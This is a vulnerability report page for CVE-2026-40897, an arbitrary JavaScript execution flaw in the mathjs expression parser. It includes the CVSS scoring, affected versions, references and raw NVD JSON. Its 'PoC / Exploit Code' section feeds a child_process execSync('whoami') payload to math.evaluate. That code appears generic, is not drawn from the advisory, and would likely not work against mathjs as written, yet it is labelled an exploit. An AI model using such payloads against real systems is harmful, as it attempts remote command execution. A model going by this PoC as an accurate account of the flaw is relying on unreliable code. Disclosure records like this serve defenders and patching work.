Security Vulnerability Report
CVE-2026-40897 CVSS 8.8 HIGH

Published: 2026-04-24 17:16:21
Last Modified: 2026-04-27 14:47:56

Description

Math.js is an extensive math library for JavaScript and Node.js. From 13.1.1 to before 15.2.0, a vulnerability allowed executing arbitrary JavaScript via the expression parser of mathjs. You can be affected when you have an application where users can evaluate arbitrary expressions using the mathjs expression parser. This vulnerability is fixed in 15.2.0.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:* - VULNERABLE
Math.js >= 13.1.1
Math.js < 15.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-40897
// Demonstrating arbitrary code execution via the mathjs expression parser
const math = require('mathjs');

// Malicious payload attempting to execute system commands
// In vulnerable versions, the parser allows access to Node.js internal functions
const payload = "process.mainModule.require('child_process').execSync('whoami').toString()";

try {
  const result = math.evaluate(payload);
  console.log("[+] Exploit Successful! Output: " + result);
} catch (error) {
  console.log("[-] Exploit Failed or Patched: " + error.message);
}

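References

https://github.com/josdejong/mathjs/commit/513ab2a0e01004af91b31aada68fae8a821326ad (Patch)
https://github.com/josdejong/mathjs/pull/3656 (Issue Tracking)
https://github.com/josdejong/mathjs/security/advisories/GHSA-29qv-4j9f-fjw5 (Vendor Advisory)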

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40897", "sourceIdentifier": "[email protected]", "published": "2026-04-24T17:16:20.783", "lastModified": "2026-04-27T14:47:56.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Math.js is an extensive math library for JavaScript and Node.js. From 13.1.1 to before 15.2.0, a vulnerability allowed executing arbitrary JavaScript via the expression parser of mathjs. You can be affected when you have an application where users can evaluate arbitrary expressions using the mathjs expression parser. This vulnerability is fixed in 15.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.1.1", "versionEndExcluding": "15.2.0", "matchCriteriaId": "8DB079CB-9A5C-4138-B8E5-7607D3DDC20A"}]}]}], "references": [{"url": "https://github.com/josdejong/mathjs/commit/513ab2a0e01004af91b31aada68fae8a821326ad", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/pull/3656", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/josdejong/mathjs/security/advisories/GHSA-29qv-4j9f-fjw5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}